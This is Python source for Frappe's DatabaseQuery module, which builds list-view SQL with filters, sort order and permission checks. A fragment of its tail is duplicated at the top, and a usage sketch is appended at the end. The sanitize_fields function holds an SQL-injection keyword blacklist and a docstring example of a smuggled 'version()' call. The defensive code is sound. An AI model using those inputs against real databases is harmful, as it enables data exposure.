frappe.get_system_settings("apply_strict_user_permissions"): condition = "" else: empty_value_condition = f"ifnull(`tab{self.doctype}`.`{df.get("fieldname")}`, '')=''" condition = empty_value_condition + " or " for permission in user_permission_values: if not permission.get('applicable_for'): docs.append(permission.get('doc')) # append docs based on user permission applicable on reference doctype # this is useful when getting list of docs from a link field # in this case parent doctype of the link # will be the reference doctype elif df.get('fieldname') == 'name' and self.reference_doctype: if permission.get('applicable_for') == self.reference_doctype: docs.append(permission.get('doc')) elif permission.get('applicable_for') == self.doctype: docs.append(permission.get('doc')) if docs: values = ", ".join(frappe.db.escape(doc, percent=False) for doc in docs) condition += f"`tab{self.doctype}`.`{df.get("fieldname")}` in ({values})" match_conditions.append(f"({condition})") match_filters[df.get('options')] = docs if match_conditions: self.match_conditions.append(" and ".join(match_conditions)) if match_filters: self.match_filters.append(match_filters) def get_permission_query_conditions(self): conditions = [] condition_methods = frappe.get_hooks("permission_query_conditions", {}).get(self.doctype, []) if condition_methods: for method in condition_methods: c = frappe.call(frappe.get_attr(method), self.user) if c: conditions.append(c) permision_script_name = get_server_script_map().get("permission_query", {}).get(self.doctype) if permision_script_name: script = frappe.get_doc("Server Script", permision_script_name) condition = script.get_permission_query_conditions(self.user) if condition: conditions.append(condition) return " and ".join(conditions) if conditions else "" def set_order_by(self, args): meta = frappe.get_meta(self.doctype) if self.order_by and self.order_by != "KEEP_DEFAULT_ORDERING": args.order_by = self.order_by else: args.order_by = "" # don't add order by from meta if a mysql group function is used without group by clause group_function_without_group_by = (len(self.fields)==1 and ( self.fields[0].lower().startswith("count(") or self.fields[0].lower().startswith("min(") or self.fields[0].lower().startswith("max(") ) and not self.group_by) if not group_function_without_group_by: sort_field = sort_order = None if 
meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc args.order_by = ', '.join( f"`tab{self.doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',') ) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' if self.order_by: args.order_by = f"`tab{self.doctype}`.`{sort_field or "modified"}` {sort_order or "desc"}" # draft docs always on top if hasattr(meta, 'is_submittable') and meta.is_submittable: if self.order_by: args.order_by = f"`tab{self.doctype}`.docstatus asc, {args.order_by}" def validate_order_by_and_group_by(self, parameters): """Check order by, group by so that atleast one column is selected and does not have subquery""" if not parameters: return _lower = parameters.lower() if 'select' in _lower and 'from' in _lower: frappe.throw(_('Cannot use sub-query in order by')) if re.compile(r".*[^a-z0-9-_ ,`'\"\.\(\)].*").match(_lower): frappe.throw(_('Illegal SQL Query')) for field in parameters.split(","): if "." in field and field.strip().startswith("`tab"): tbl = field.strip().split('.')[0] if tbl not in self.tables: if tbl.startswith('`'): tbl = tbl[4:-1] frappe.throw(_("Please select atleast 1 column from {0} to sort/group").format(tbl)) def add_limit(self): if self.limit_page_length: return 'limit %s offset %s' % (self.limit_page_length, self.limit_start) else: return '' def add_comment_count(self, result): for r in result: if not r.name: continue r._comment_count = 0 if "_comments" in r: r._comment_count = len(json.loads(r._comments or "[]")) def update_user_settings(self): # update user settings if new search user_settings = json.loads(get_user_settings(self.doctype)) if hasattr(self, 'user_settings'): user_settings.update(self.user_settings) if self.save_user_settings_fields: user_settings['fields'] = self.user_settings_fields update_user_settings(self.doctype, user_settings) def check_parent_permission(parent, child_doctype): if parent: # User may pass fake parent and get the information from the child table if child_doctype and not ( frappe.db.exists('DocField', {'parent': parent, 'options': child_doctype}) or frappe.db.exists('Custom Field', {'dt': parent, 'options': child_doctype}) ): raise frappe.PermissionError if frappe.permissions.has_permission(parent): return # Either parent not passed or the user doesn't have permission on parent doctype of child table! 
raise frappe.PermissionError def get_order_by(doctype, meta): order_by = "" sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc order_by = ', '.join(f"`tab{doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',')) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' order_by = f"`tab{doctype}`.`{sort_field or "modified"}` {sort_order or "desc"}" # draft docs always on top if meta.is_submittable: order_by = f"`tab{doctype}`.docstatus asc, {order_by}" return order_by def is_parent_only_filter(doctype, filters): #check if filters contains only parent doctype only_parent_doctype = True if isinstance(filters, list): for flt in filters: if doctype not in flt: only_parent_doctype = False if 'Between' in flt: flt[3] = get_between_date_filter(flt[3]) return only_parent_doctype def has_any_user_permission_for_doctype(doctype, user, applicable_for): user_permissions = frappe.permissions.get_user_permissions(user=user) doctype_user_permissions = user_permissions.get(doctype, []) for permission in doctype_user_permissions: if not permission.applicable_for or permission.applicable_for == applicable_for: return True return False def get_between_date_filter(value, df=None): ''' return the formattted date as per the given example [u'2017-11-01', u'2017-11-03'] => '2017-11-01 00:00:00.000000' AND '2017-11-04 00:00:00.000000' ''' from_date = frappe.utils.nowdate() to_date = frappe.utils.nowdate() if value and isinstance(value, (list, tuple)): if len(value) >= 1: from_date = value[0] if len(value) >= 2: to_date = value[1] if not df or (df and df.fieldtype == 'Datetime'): to_date = add_to_date(to_date, days=1) if df and df.fieldtype == 'Datetime': data = "'%s' AND '%s'" % ( frappe.db.format_datetime(from_date), frappe.db.format_datetime(to_date)) else: data = "'%s' AND '%s'" % ( frappe.db.format_date(from_date), frappe.db.format_date(to_date)) return data def get_additional_filter_field(additional_filters_config, f, value): additional_filter = additional_filters_config[f.operator.lower()] f = frappe._dict(frappe.get_attr(additional_filter['get_field'])()) if f.query_value: for option in f.options: option = frappe._dict(option) if option.value == value: f.value = option.query_value return f def get_date_range(operator, value): timespan_map = { '1 week': 'week', '1 month': 'month', '3 months': 'quarter', '6 months': '6 months', '1 year': 'year', } period_map = { 'previous': 'last', 'next': 'next', } timespan = period_map[operator] + ' ' + timespan_map[value] if operator != 'timespan' else value return get_timespan_date_range(timespan) def requires_owner_constraint(role_permissions): """Returns True if "select" or "read" isn't available without being creator.""" if not role_permissions.get("has_if_owner_enabled"): return if_owner_perms = role_permissions.get("if_owner") if not if_owner_perms: return # has select or read without if owner, no need for constraint for perm_type in ("select", "read"): if role_permissions.get(perm_type) and perm_type not in if_owner_perms: return # not checking if either select or read if present in if_owner_perms # because either of those is required to perform a query return True
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: MIT. See LICENSE """build query for doclistview and return results""" from typing import List import frappe.defaults from frappe.query_builder.utils import Column import frappe.share from frappe import _ import frappe.permissions from datetime import datetime import frappe, json, copy, re from frappe.model import optional_fields from frappe.model.utils.user_settings import get_user_settings, update_user_settings from frappe.utils import flt, cint, get_time, make_filter_tuple, get_filter, add_to_date, cstr, get_timespan_date_range from frappe.model.meta import get_table_columns from frappe.core.doctype.server_script.server_script_utils import get_server_script_map class DatabaseQuery(object): def __init__(self, doctype, user=None): self.doctype = doctype self.tables = [] self.conditions = [] self.or_conditions = [] self.fields = None self.user = user or frappe.session.user self.ignore_ifnull = False self.flags = frappe._dict() self.reference_doctype = None def execute(self, fields=None, filters=None, or_filters=None, docstatus=None, group_by=None, order_by="KEEP_DEFAULT_ORDERING", limit_start=False, limit_page_length=None, as_list=False, with_childnames=False, debug=False, ignore_permissions=False, user=None, with_comment_count=False, join='left join', distinct=False, start=None, page_length=None, limit=None, ignore_ifnull=False, save_user_settings=False, save_user_settings_fields=False, update=None, add_total_row=None, user_settings=None, reference_doctype=None, run=True, strict=True, pluck=None, ignore_ddl=False, parent_doctype=None) -> List: if ( not ignore_permissions and not frappe.has_permission(self.doctype, "select", user=user, parent_doctype=parent_doctype) and not frappe.has_permission(self.doctype, "read", user=user, parent_doctype=parent_doctype) ): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(self.doctype)) raise frappe.PermissionError(self.doctype) # filters and fields swappable # its hard to remember what comes first if ( isinstance(fields, dict) or ( fields and isinstance(fields, list) and isinstance(fields[0], list) ) ): # if fields is given as dict/list of list, its probably filters filters, fields = fields, filters elif fields and isinstance(filters, list) \ and len(filters) > 1 and isinstance(filters[0], str): # if `filters` is a list of strings, its probably fields filters, fields = fields, filters if fields: self.fields = fields else: self.fields = [f"`tab{self.doctype}`.`{pluck or 'name'}`"] if start: limit_start = start if page_length: limit_page_length = page_length if limit: limit_page_length = limit self.filters = filters or [] self.or_filters = or_filters or [] self.docstatus = docstatus or [] self.group_by = group_by self.order_by = order_by self.limit_start = cint(limit_start) self.limit_page_length = cint(limit_page_length) if limit_page_length else None self.with_childnames = with_childnames self.debug = debug self.join = join self.distinct = distinct self.as_list = as_list self.ignore_ifnull = ignore_ifnull self.flags.ignore_permissions = ignore_permissions self.user = user or frappe.session.user self.update = update self.user_settings_fields = copy.deepcopy(self.fields) self.run = run self.strict = strict self.ignore_ddl = ignore_ddl # for contextual user permission check # to determine which user permission is applicable on link field of specific doctype self.reference_doctype = reference_doctype or self.doctype if user_settings: 
self.user_settings = json.loads(user_settings) self.columns = self.get_table_columns() # no table & ignore_ddl, return if not self.columns: return [] result = self.build_and_run() if with_comment_count and not as_list and self.doctype: self.add_comment_count(result) if save_user_settings: self.save_user_settings_fields = save_user_settings_fields self.update_user_settings() if pluck: return [d[pluck] for d in result] return result def build_and_run(self): args = self.prepare_args() args.limit = self.add_limit() if args.conditions: args.conditions = "where " + args.conditions if self.distinct: args.fields = 'distinct ' + args.fields args.order_by = '' # TODO: recheck for alternative # Postgres requires any field that appears in the select clause to also # appear in the order by and group by clause if frappe.db.db_type == 'postgres' and args.order_by and args.group_by: args = self.prepare_select_args(args) query = """select %(fields)s from %(tables)s %(conditions)s %(group_by)s %(order_by)s %(limit)s""" % args return frappe.db.sql(query, as_dict=not self.as_list, debug=self.debug, update=self.update, ignore_ddl=self.ignore_ddl, run=self.run) def prepare_args(self): self.parse_args() self.sanitize_fields() self.extract_tables() self.set_optional_columns() self.build_conditions() args = frappe._dict() if self.with_childnames: for t in self.tables: if t != "`tab" + self.doctype + "`": self.fields.append(t + ".name as '%s:name'" % t[4:-1]) # query dict args.tables = self.tables[0] # left join parent, child tables for child in self.tables[1:]: args.tables += f" {self.join} {child} on ({child}.parent = {self.tables[0]}.name)" if self.grouped_or_conditions: self.conditions.append(f"({' or '.join(self.grouped_or_conditions)})") args.conditions = ' and '.join(self.conditions) if self.or_conditions: args.conditions += (' or ' if args.conditions else "") + \ ' or '.join(self.or_conditions) self.set_field_tables() fields = [] # Wrapping fields with grave quotes to allow support for sql keywords # TODO: Add support for wrapping fields with sql functions and distinct keyword for field in self.fields: stripped_field = field.strip().lower() skip_wrapping = any([ stripped_field.startswith(("`", "*", '"', "'")), "(" in stripped_field, "distinct" in stripped_field, ]) if skip_wrapping: fields.append(field) elif "as" in field.lower().split(" "): col, _, new = field.split() fields.append(f"`{col}` as {new}") else: fields.append(f"`{field}`") args.fields = ", ".join(fields) self.set_order_by(args) self.validate_order_by_and_group_by(args.order_by) args.order_by = args.order_by and (" order by " + args.order_by) or "" self.validate_order_by_and_group_by(self.group_by) args.group_by = self.group_by and (" group by " + self.group_by) or "" return args def prepare_select_args(self, args): order_field = re.sub(r"\ order\ by\ |\ asc|\ ASC|\ desc|\ DESC", "", args.order_by) if order_field not in args.fields: extracted_column = order_column = order_field.replace("`", "") if "." 
in extracted_column: extracted_column = extracted_column.split(".")[1] args.fields += f", MAX({extracted_column}) as `{order_column}`" args.order_by = args.order_by.replace(order_field, f"`{order_column}`") return args def parse_args(self): """Convert fields and filters from strings to list, dicts""" if isinstance(self.fields, str): if self.fields == "*": self.fields = ["*"] else: try: self.fields = json.loads(self.fields) except ValueError: self.fields = [f.strip() for f in self.fields.split(",")] # remove empty strings / nulls in fields self.fields = [f for f in self.fields if f] for filter_name in ["filters", "or_filters"]: filters = getattr(self, filter_name) if isinstance(filters, str): filters = json.loads(filters) if isinstance(filters, dict): fdict = filters filters = [] for key, value in fdict.items(): filters.append(make_filter_tuple(self.doctype, key, value)) setattr(self, filter_name, filters) def sanitize_fields(self): ''' regex : ^.*[,();].* purpose : The regex will look for malicious patterns like `,`, '(', ')', '@', ;' in each field which may leads to sql injection. example : field = "`DocType`.`issingle`, version()" As field contains `,` and mysql function `version()`, with the help of regex the system will filter out this field. ''' sub_query_regex = re.compile("^.*[,();@].*") blacklisted_keywords = ['select', 'create', 'insert', 'delete', 'drop', 'update', 'case', 'show'] blacklisted_functions = ['concat', 'concat_ws', 'if', 'ifnull', 'nullif', 'coalesce', 'connection_id', 'current_user', 'database', 'last_insert_id', 'session_user', 'system_user', 'user', 'version', 'global'] def _raise_exception(): frappe.throw(_('Use of sub-query or function is restricted'), frappe.DataError) def _is_query(field): if re.compile(r"^(select|delete|update|drop|create)\s").match(field): _raise_exception() elif re.compile(r"\s*[0-9a-zA-z]*\s*( from | group by | order by | where | join )").match(field): _raise_exception() for field in self.fields: if sub_query_regex.match(field): if any(keyword in field.lower().split() for keyword in blacklisted_keywords): _raise_exception() if any(f"({keyword}" in field.lower() for keyword in blacklisted_keywords): _raise_exception() if any(f"{keyword}(" in field.lower() for keyword in blacklisted_functions): _raise_exception() if '@' in field.lower(): # prevent access to global variables _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*'").match(field): _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*,").match(field): _raise_exception() _is_query(field) if self.strict: if re.compile(r".*/\*.*").match(field): frappe.throw(_('Illegal SQL Query')) if re.compile(r".*\s(union).*\s").match(field.lower()): frappe.throw(_('Illegal SQL Query')) def extract_tables(self): """extract tables from fields""" self.tables = [f"`tab{self.doctype}`"] sql_functions = [ "dayofyear(", "extract(", "locate(", "strpos(", "count(", "sum(", "avg(", ] # add tables from fields if self.fields: for field in self.fields: if not ("tab" in field and "." 
in field) or any(x for x in sql_functions if x in field): continue table_name = field.split('.')[0] if table_name.lower().startswith('group_concat('): table_name = table_name[13:] if table_name.lower().startswith('ifnull('): table_name = table_name[7:] if not table_name[0]=='`': table_name = f"`{table_name}`" if not table_name in self.tables: self.append_table(table_name) def append_table(self, table_name): self.tables.append(table_name) doctype = table_name[4:-1] ptype = 'select' if frappe.only_has_select_perm(doctype) else 'read' if not self.flags.ignore_permissions and \ not frappe.has_permission(doctype, ptype=ptype, parent_doctype=self.doctype): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(doctype)) raise frappe.PermissionError(doctype) def set_field_tables(self): '''If there are more than one table, the fieldname must not be ambiguous. If the fieldname is not explicitly mentioned, set the default table''' def _in_standard_sql_methods(field): methods = ('count(', 'avg(', 'sum(', 'extract(', 'dayofyear(') return field.lower().startswith(methods) if len(self.tables) > 1: for idx, field in enumerate(self.fields): if '.' not in field and not _in_standard_sql_methods(field): self.fields[idx] = f"{self.tables[0]}.{field}" def get_table_columns(self): try: return get_table_columns(self.doctype) except frappe.db.TableMissingError: if self.ignore_ddl: return None else: raise def set_optional_columns(self): """Removes optional columns like `_user_tags`, `_comments` etc. if not in table""" # remove from fields to_remove = [] for fld in self.fields: for f in optional_fields: if f in fld and not f in self.columns: to_remove.append(fld) for fld in to_remove: del self.fields[self.fields.index(fld)] # remove from filters to_remove = [] for each in self.filters: if isinstance(each, str): each = [each] for element in each: if element in optional_fields and element not in self.columns: to_remove.append(each) for each in to_remove: if isinstance(self.filters, dict): del self.filters[each] else: self.filters.remove(each) def build_conditions(self): self.conditions = [] self.grouped_or_conditions = [] self.build_filter_conditions(self.filters, self.conditions) self.build_filter_conditions(self.or_filters, self.grouped_or_conditions) # match conditions if not self.flags.ignore_permissions: match_conditions = self.build_match_conditions() if match_conditions: self.conditions.append(f"({match_conditions})") def build_filter_conditions(self, filters, conditions, ignore_permissions=None): """build conditions from user filters""" if ignore_permissions is not None: self.flags.ignore_permissions = ignore_permissions if isinstance(filters, dict): filters = [filters] for f in filters: if isinstance(f, str): conditions.append(f) else: conditions.append(self.prepare_filter_condition(f)) def prepare_filter_condition(self, f): """Returns a filter condition in the format: ifnull(`tabDocType`.`fieldname`, fallback) operator "value" """ from frappe.boot import get_additional_filters_from_hooks additional_filters_config = get_additional_filters_from_hooks() f = get_filter(self.doctype, f, additional_filters_config) tname = ('`tab' + f.doctype + '`') if not tname in self.tables: self.append_table(tname) if 'ifnull(' in f.fieldname: column_name = f.fieldname else: column_name = f"{tname}.{f.fieldname}" can_be_null = True if f.operator.lower() in additional_filters_config: f.update(get_additional_filter_field(additional_filters_config, f, f.value)) # prepare in condition if 
f.operator.lower() in ('ancestors of', 'descendants of', 'not ancestors of', 'not descendants of'): values = f.value or '' # TODO: handle list and tuple # if not isinstance(values, (list, tuple)): # values = values.split(",") ref_doctype = f.doctype if frappe.get_meta(f.doctype).get_field(f.fieldname) is not None : ref_doctype = frappe.get_meta(f.doctype).get_field(f.fieldname).options result=[] lft, rgt = '', '' if f.value: lft, rgt = frappe.db.get_value(ref_doctype, f.value, ["lft", "rgt"]) # Get descendants elements of a DocType with a tree structure if f.operator.lower() in ('descendants of', 'not descendants of') : result = frappe.get_all(ref_doctype, filters={ 'lft': ['>', lft], 'rgt': ['<', rgt] }, order_by='`lft` ASC') else : # Get ancestor elements of a DocType with a tree structure result = frappe.get_all(ref_doctype, filters={ 'lft': ['<', lft], 'rgt': ['>', rgt] }, order_by='`lft` DESC') fallback = "''" value = [frappe.db.escape((v.name or '').strip(), percent=False) for v in result] if len(value): value = f"({', '.join(value)})" else: value = "('')" # changing operator to IN as the above code fetches all the parent / child values and convert into tuple # which can be directly used with IN operator to query. f.operator = 'not in' if f.operator.lower() in ('not ancestors of', 'not descendants of') else 'in' elif f.operator.lower() in ('in', 'not in'): values = f.value or '' if isinstance(values, str): values = values.split(",") fallback = "''" value = [frappe.db.escape((v or '').strip(), percent=False) for v in values] if len(value): value = f"({', '.join(value)})" else: value = "('')" else: df = frappe.get_meta(f.doctype).get("fields", {"fieldname": f.fieldname}) df = df[0] if df else None if df and df.fieldtype in ("Check", "Float", "Int", "Currency", "Percent"): can_be_null = False if f.operator.lower() in ('previous', 'next', 'timespan'): date_range = get_date_range(f.operator.lower(), f.value) f.operator = "Between" f.value = date_range fallback = "'0001-01-01 00:00:00'" if f.operator in ('>', '<') and (f.fieldname in ('creation', 'modified')): value = cstr(f.value) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() in ('between') and \ (f.fieldname in ('creation', 'modified') or (df and (df.fieldtype=="Date" or df.fieldtype=="Datetime"))): value = get_between_date_filter(f.value, df) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() == "is": if f.value == 'set': f.operator = '!=' elif f.value == 'not set': f.operator = '=' value = "" fallback = "''" can_be_null = True if 'ifnull' not in column_name: column_name = f'ifnull({column_name}, {fallback})' elif df and df.fieldtype=="Date": value = frappe.db.format_date(f.value) fallback = "'0001-01-01'" elif (df and df.fieldtype=="Datetime") or isinstance(f.value, datetime): value = frappe.db.format_datetime(f.value) fallback = "'0001-01-01 00:00:00'" elif df and df.fieldtype=="Time": value = get_time(f.value).strftime("%H:%M:%S.%f") fallback = "'00:00:00'" elif f.operator.lower() in ("like", "not like") or (isinstance(f.value, str) and (not df or df.fieldtype not in ["Float", "Int", "Currency", "Percent", "Check"])): value = "" if f.value is None else f.value fallback = "''" if f.operator.lower() in ("like", "not like") and isinstance(value, str): # because "like" uses backslash (\) for escaping value = value.replace("\\", "\\\\").replace("%", "%%") elif f.operator == '=' and df and df.fieldtype in ['Link', 'Data']: # TODO: Refactor if possible value = f.value or "''" fallback = "''" elif f.fieldname == 'name': 
value = f.value or "''" fallback = "''" else: value = flt(f.value) fallback = 0 if isinstance(f.value, Column): can_be_null = False # added to avoid the ifnull/coalesce addition quote = '"' if frappe.conf.db_type == 'postgres' else "`" value = f"{tname}.{quote}{f.value.name}{quote}" # escape value elif isinstance(value, str) and not f.operator.lower() == 'between': value = f"{frappe.db.escape(value, percent=False)}" if ( self.ignore_ifnull or not can_be_null or (f.value and f.operator.lower() in ('=', 'like')) or 'ifnull(' in column_name.lower() ): if f.operator.lower() == 'like' and frappe.conf.get('db_type') == 'postgres': f.operator = 'ilike' condition = f'{column_name} {f.operator} {value}' else: condition = f'ifnull({column_name}, {fallback}) {f.operator} {value}' return condition def build_match_conditions(self, as_condition=True): """add match conditions if applicable""" self.match_filters = [] self.match_conditions = [] only_if_shared = False if not self.user: self.user = frappe.session.user if not self.tables: self.extract_tables() meta = frappe.get_meta(self.doctype) role_permissions = frappe.permissions.get_role_permissions(meta, user=self.user) self.shared = frappe.share.get_shared(self.doctype, self.user) if ( not meta.istable and not (role_permissions.get("select") or role_permissions.get("read")) and not self.flags.ignore_permissions and not has_any_user_permission_for_doctype(self.doctype, self.user, self.reference_doctype) ): only_if_shared = True if not self.shared: frappe.throw(_("No permission to read {0}").format(self.doctype), frappe.PermissionError) else: self.conditions.append(self.get_share_condition()) else: # skip user perm check if owner constraint is required if requires_owner_constraint(role_permissions): self.match_conditions.append( f"`tab{self.doctype}`.`owner` = {frappe.db.escape(self.user, percent=False)}" ) # add user permission only if role has read perm elif role_permissions.get("read") or role_permissions.get("select"): # get user permissions user_permissions = frappe.permissions.get_user_permissions(self.user) self.add_user_permissions(user_permissions) if as_condition: conditions = "" if self.match_conditions: # will turn out like ((blog_post in (..) 
and blogger in (...)) or (blog_category in (...))) conditions = "((" + ") or (".join(self.match_conditions) + "))" doctype_conditions = self.get_permission_query_conditions() if doctype_conditions: conditions += (' and ' + doctype_conditions) if conditions else doctype_conditions # share is an OR condition, if there is a role permission if not only_if_shared and self.shared and conditions: conditions = f"({conditions}) or ({self.get_share_condition()})" return conditions else: return self.match_filters def get_share_condition(self): return f"`tab{self.doctype}`.name in ({', '.join(frappe.db.escape(s, percent=False) for s in self.shared)})" def add_user_permissions(self, user_permissions): meta = frappe.get_meta(self.doctype) doctype_link_fields = [] doctype_link_fields = meta.get_link_fields() # append current doctype with fieldname as 'name' as first link field doctype_link_fields.append(dict( options=self.doctype, fieldname='name', )) match_filters = {} match_conditions = [] for df in doctype_link_fields: if df.get('ignore_user_permissions'): continue user_permission_values = user_permissions.get(df.get('options'), {}) if user_permission_values: docs = [] if frappe.get_system_settings("apply_strict_user_permissions"): condition = "" else: empty_value_condition = f"ifnull(`tab{self.doctype}`.`{df.get('fieldname')}`, '')=''" condition = empty_value_condition + " or " for permission in user_permission_values: if not permission.get('applicable_for'): docs.append(permission.get('doc')) # append docs based on user permission applicable on reference doctype # this is useful when getting list of docs from a link field # in this case parent doctype of the link # will be the reference doctype elif df.get('fieldname') == 'name' and self.reference_doctype: if permission.get('applicable_for') == self.reference_doctype: docs.append(permission.get('doc')) elif permission.get('applicable_for') == self.doctype: docs.append(permission.get('doc')) if docs: values = ", ".join(frappe.db.escape(doc, percent=False) for doc in docs) condition += f"`tab{self.doctype}`.`{df.get('fieldname')}` in ({values})" match_conditions.append(f"({condition})") match_filters[df.get('options')] = docs if match_conditions: self.match_conditions.append(" and ".join(match_conditions)) if match_filters: self.match_filters.append(match_filters) def get_permission_query_conditions(self): conditions = [] condition_methods = frappe.get_hooks("permission_query_conditions", {}).get(self.doctype, []) if condition_methods: for method in condition_methods: c = frappe.call(frappe.get_attr(method), self.user) if c: conditions.append(c) permision_script_name = get_server_script_map().get("permission_query", {}).get(self.doctype) if permision_script_name: script = frappe.get_doc("Server Script", permision_script_name) condition = script.get_permission_query_conditions(self.user) if condition: conditions.append(condition) return " and ".join(conditions) if conditions else "" def set_order_by(self, args): meta = frappe.get_meta(self.doctype) if self.order_by and self.order_by != "KEEP_DEFAULT_ORDERING": args.order_by = self.order_by else: args.order_by = "" # don't add order by from meta if a mysql group function is used without group by clause group_function_without_group_by = (len(self.fields)==1 and ( self.fields[0].lower().startswith("count(") or self.fields[0].lower().startswith("min(") or self.fields[0].lower().startswith("max(") ) and not self.group_by) if not group_function_without_group_by: sort_field = sort_order = None if 
meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc args.order_by = ', '.join( f"`tab{self.doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',') ) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' if self.order_by: args.order_by = f"`tab{self.doctype}`.`{sort_field or 'modified'}` {sort_order or 'desc'}" # draft docs always on top if hasattr(meta, 'is_submittable') and meta.is_submittable: if self.order_by: args.order_by = f"`tab{self.doctype}`.docstatus asc, {args.order_by}" def validate_order_by_and_group_by(self, parameters): """Check order by, group by so that atleast one column is selected and does not have subquery""" if not parameters: return _lower = parameters.lower() if 'select' in _lower and 'from' in _lower: frappe.throw(_('Cannot use sub-query in order by')) if re.compile(r".*[^a-z0-9-_ ,`'\"\.\(\)].*").match(_lower): frappe.throw(_('Illegal SQL Query')) for field in parameters.split(","): if "." in field and field.strip().startswith("`tab"): tbl = field.strip().split('.')[0] if tbl not in self.tables: if tbl.startswith('`'): tbl = tbl[4:-1] frappe.throw(_("Please select atleast 1 column from {0} to sort/group").format(tbl)) def add_limit(self): if self.limit_page_length: return 'limit %s offset %s' % (self.limit_page_length, self.limit_start) else: return '' def add_comment_count(self, result): for r in result: if not r.name: continue r._comment_count = 0 if "_comments" in r: r._comment_count = len(json.loads(r._comments or "[]")) def update_user_settings(self): # update user settings if new search user_settings = json.loads(get_user_settings(self.doctype)) if hasattr(self, 'user_settings'): user_settings.update(self.user_settings) if self.save_user_settings_fields: user_settings['fields'] = self.user_settings_fields update_user_settings(self.doctype, user_settings) def check_parent_permission(parent, child_doctype): if parent: # User may pass fake parent and get the information from the child table if child_doctype and not ( frappe.db.exists('DocField', {'parent': parent, 'options': child_doctype}) or frappe.db.exists('Custom Field', {'dt': parent, 'options': child_doctype}) ): raise frappe.PermissionError if frappe.permissions.has_permission(parent): return # Either parent not passed or the user doesn't have permission on parent doctype of child table! 
raise frappe.PermissionError def get_order_by(doctype, meta): order_by = "" sort_field = sort_order = None if meta.sort_field and ',' in meta.sort_field: # multiple sort given in doctype definition # Example: # `idx desc, modified desc` # will covert to # `tabItem`.`idx` desc, `tabItem`.`modified` desc order_by = ', '.join(f"`tab{doctype}`.`{f.split()[0].strip()}` {f.split()[1].strip()}" for f in meta.sort_field.split(',')) else: sort_field = meta.sort_field or 'modified' sort_order = (meta.sort_field and meta.sort_order) or 'desc' order_by = f"`tab{doctype}`.`{sort_field or 'modified'}` {sort_order or 'desc'}" # draft docs always on top if meta.is_submittable: order_by = f"`tab{doctype}`.docstatus asc, {order_by}" return order_by def is_parent_only_filter(doctype, filters): #check if filters contains only parent doctype only_parent_doctype = True if isinstance(filters, list): for flt in filters: if doctype not in flt: only_parent_doctype = False if 'Between' in flt: flt[3] = get_between_date_filter(flt[3]) return only_parent_doctype def has_any_user_permission_for_doctype(doctype, user, applicable_for): user_permissions = frappe.permissions.get_user_permissions(user=user) doctype_user_permissions = user_permissions.get(doctype, []) for permission in doctype_user_permissions: if not permission.applicable_for or permission.applicable_for == applicable_for: return True return False def get_between_date_filter(value, df=None): ''' return the formattted date as per the given example [u'2017-11-01', u'2017-11-03'] => '2017-11-01 00:00:00.000000' AND '2017-11-04 00:00:00.000000' ''' from_date = frappe.utils.nowdate() to_date = frappe.utils.nowdate() if value and isinstance(value, (list, tuple)): if len(value) >= 1: from_date = value[0] if len(value) >= 2: to_date = value[1] if not df or (df and df.fieldtype == 'Datetime'): to_date = add_to_date(to_date, days=1) if df and df.fieldtype == 'Datetime': data = "'%s' AND '%s'" % ( frappe.db.format_datetime(from_date), frappe.db.format_datetime(to_date)) else: data = "'%s' AND '%s'" % ( frappe.db.format_date(from_date), frappe.db.format_date(to_date)) return data def get_additional_filter_field(additional_filters_config, f, value): additional_filter = additional_filters_config[f.operator.lower()] f = frappe._dict(frappe.get_attr(additional_filter['get_field'])()) if f.query_value: for option in f.options: option = frappe._dict(option) if option.value == value: f.value = option.query_value return f def get_date_range(operator, value): timespan_map = { '1 week': 'week', '1 month': 'month', '3 months': 'quarter', '6 months': '6 months', '1 year': 'year', } period_map = { 'previous': 'last', 'next': 'next', } timespan = period_map[operator] + ' ' + timespan_map[value] if operator != 'timespan' else value return get_timespan_date_range(timespan) def requires_owner_constraint(role_permissions): """Returns True if "select" or "read" isn't available without being creator.""" if not role_permissions.get("has_if_owner_enabled"): return if_owner_perms = role_permissions.get("if_owner") if not if_owner_perms: return # has select or read without if owner, no need for constraint for perm_type in ("select", "read"): if role_permissions.get(perm_type) and perm_type not in if_owner_perms: return # not checking if either select or read if present in if_owner_perms # because either of those is required to perform a query return True
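# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the upstream module). It shows how
# DatabaseQuery is typically driven: instantiate it with a DocType name and
# call execute() with fields, filters and paging arguments, as defined in the
# execute() signature above. The "ToDo" DocType and the concrete field/filter
# values below are assumptions chosen only for demonstration; any DocType the
# session user can read works the same way.
def _example_database_query_usage():
    # Filters use the [doctype, fieldname, operator, value] list format that
    # get_filter()/build_filter_conditions() expect; a dict such as
    # {"status": "Open"} is also accepted and converted via make_filter_tuple().
    query = DatabaseQuery("ToDo")
    return query.execute(
        fields=["name", "description", "status"],
        filters=[["ToDo", "status", "=", "Open"]],
        order_by="`tabToDo`.`modified` desc",
        limit_start=0,
        limit_page_length=20,
    )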
